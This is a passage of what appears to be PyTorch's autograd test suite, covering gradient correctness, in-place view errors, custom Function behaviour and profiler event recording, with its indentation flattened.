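# counter, so the pending backward must detect that x was modified.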
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This test checks the backward engine for a very subtle bug that appeared
# in one of the initial versions of autograd. Gradient tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. The engine used to keep a need_copy
# set of tensors that would need a clone upon the next addition, and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from the need_copy set.
# 2. When accumulating in the second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in the 3rd place).
# 3. When accumulating in the third place, it wasn't in the need_copy set
# either, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
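# Pickling should round-trip both the values and the requires_grad flag
# across pickle protocols 0-2.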
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
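# set_grad_enabled should work both as a context manager and as a plain
# function call that overrides an enclosing context.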
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishes on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat(self):
f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
0)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
-1)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_1", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
-2)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_2", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False is passed below, but gradcheck is run explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty", "cat",
lambda a, b: torch.cat((a, b)),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_trapz(self):
f_args_variable = (torch.randn(2, 3, dtype=torch.double, requires_grad=True),
torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]], dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_trapz", "trapz",
lambda y, x: torch.trapz(y, x),
True, f_args_variable, f_args_tensor)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck perturbs the input by +/- eps (defaults to 1e-06)
# to compute the numerical gradient, which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in lobpcg's forward.
# Note that this is not required if symeig is used in the forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
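# Where the two inputs tie, the gradient is split evenly (0.5 to each input);
# otherwise it flows entirely to the selected input.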
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
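# The norm of an all-zero tensor is not differentiable at zero; autograd should
# pick the zero subgradient rather than producing NaN.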
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igammac, (s, x))
gradgradcheck(torch.igammac, (s, x))
def test_profiler(self):
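# The profiler should report itself as enabled only inside the profiling context
# and should record the aten::mul / aten::add ops from x * 2 + 4.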
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEqual(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add and aten::sum to have sequence numbers,
# and expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# a sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that the profiler will be able
# to propagate across the fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
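# A user-defined record_function("foo") range should appear exactly once in the
# collected function events.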
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
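# Aggregate two "foo" events (5us and 10us), then add the average to itself:
# counts and totals double (4 calls, 30us) while the per-call average stays 7.5us.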
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage, because that may
# produce NaN in the output and consequently fail the numerical Jacobian check
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
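# Requesting a different dtype for the reduction should not change the gradient
# values, and the gradient should keep the input's dtype (float here).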
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
